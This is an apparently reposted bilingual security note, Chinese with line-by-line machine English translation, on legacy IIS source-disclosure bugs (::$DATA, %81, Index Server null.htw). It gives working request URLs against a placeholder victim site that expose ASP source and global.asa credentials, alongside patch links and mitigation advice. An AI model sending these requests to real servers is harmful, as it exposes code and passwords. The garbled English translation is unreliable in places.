by ieplayboy by ieplayboy
看ASP 代码的早期漏洞有在文件后面加入::$DATA , %81 等...... ASP code to see the early vulnerabilities in the file, insert:: $ DATA,% 81, etc. ......
例如http://localhost/default.asp::$DATA, http://localhost/default.%81这些但此漏洞都在windows NT4 上由于安装错误才实现的。 For example http://localhost/default.asp:: $ DATA, http://localhost/default.% 81 of these but it could have on the windows NT4 was achieved due to installation errors.
一般这样的安装顺序:nt4 + nt sp3 + ie401sp1 + option pack + sp4 , 肯定没有::$DATA漏洞. This general order of installation: nt4 + nt sp3 + ie401sp1 + option pack + sp4, certainly not:: $ DATA vulnerability.
Cerberus安全组织发现了微软Index Server的第三个可以察看asp源代码和其它页面的漏洞。 Cerberus Security Organization found that Microsoft Index Server can look at the third asp page source code and other loopholes. 包括运行IIS4或者IIS5的Index Server,甚至以及添打了最近关于参看源代码的补丁程序的系统,或者没有.htw文件的系统,一样存在该问题。 Including running IIS4 or IIS5's Index Server, and even see Tim play the latest source code on the system patch or not. Htw file system, as there is the problem. 获得asp程序,甚至global.asa文件的源代码,无疑对系统是一个非常重大的安全隐患。 Get asp program, or even the source code of the global.asa file, the system is undoubtedly a very significant security risk. 往往这些代码中包含了用户密码和ID,以及数据库的源路径和名称等等。 These codes are often included in the user's password and ID, as well as the source path and name of the database and so on. 这对于攻击者收集系统信息,方面下一步的入侵都是非常重要的。 This is for the attacker to collect system information, the invasion of the next step is very important.
但这个漏洞在windows advance server 2000, windows server 2000 都已经不存在。 However, this loophole in the windows advance server 2000, windows server 2000 no longer to exist.
但主要看有没有安装Index Server 了。 But mainly to see if the Index Server installed.
受影响的系统: Microsoft IIS4.0 Microsoft II5.0 Affected systems: Microsoft IIS4.0 Microsoft II5.0
漏洞的利用: Exploitation of the vulnerability:
由于'null.htw'文件并非真正的系统映射文件,所以只是一个储存在系统内存中的虚拟文件。 As the 'null.htw' file system is not really a mapping file, so just a memory stored in the virtual file system. 哪怕你已经从你的系统中删除了所有的真实的.htw文件,但是由于对null.htw文件的请求默认是由webhits.dll来处理。 Even if you have deleted from your system all of the real. Htw file, but due to requests for files on null.htw default by webhits.dll to deal with. 所以,IIS仍然收到该漏洞的威胁。 Therefore, IIS still receives the vulnerability.
发送一个这样的请求: Send such a request:
http://www.victim.com/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full http://www.victim.com/null.htw?CiWebHitsFile=/default.asp% 20 & CiRestriction = none & CiHiliteType = Full
将获得Web根目录下的default.asp的源代码。 Will receive the default.asp Web root directory of the source code.
例子: Example:
/default.asp是以web的根开始计算。 / Default.asp is the web root is counted. 如某站点的http://www.victim.com/welcome/welcome.asp那么对应就是: If a site is http://www.victim.com/welcome/welcome.asp then corresponds to:
http://www.victim.com/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full http://www.victim.com/null.htw?CiWebHitsFile=/welcome/welcome.asp% 20 & CiRestriction = none & CiHiliteType = Full
解决方案: Solution:
如果该webhits提供的功能是系统必须的,请下载相应的补丁程序。 If the functionality provided by the system webhits necessary, please download the appropriate patch. 如果没必要,请用IIS的MMC管理工具简单移除.htw的映象文件。 If you do not need, use the IIS MMC administration tool is easy to remove. Htw of the image file.
微软已经对该问题发放了补丁: Microsoft has released a patch for the problem:
Index Server 2.0: Index Server 2.0:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727 Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728 Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Windows 2000 Indexing Services: Windows 2000 Indexing Services:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726 Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726
相关链接: Related links:
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspinc.htm http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspinc.htm
http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspsucurityone.htm http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspsucurityone.htm
http://soft.xxinfo.ha.cn/mudfrog/txt/see-asp.htm http://soft.xxinfo.ha.cn/mudfrog/txt/see-asp.htm
Tidak ada komentar:
Posting Komentar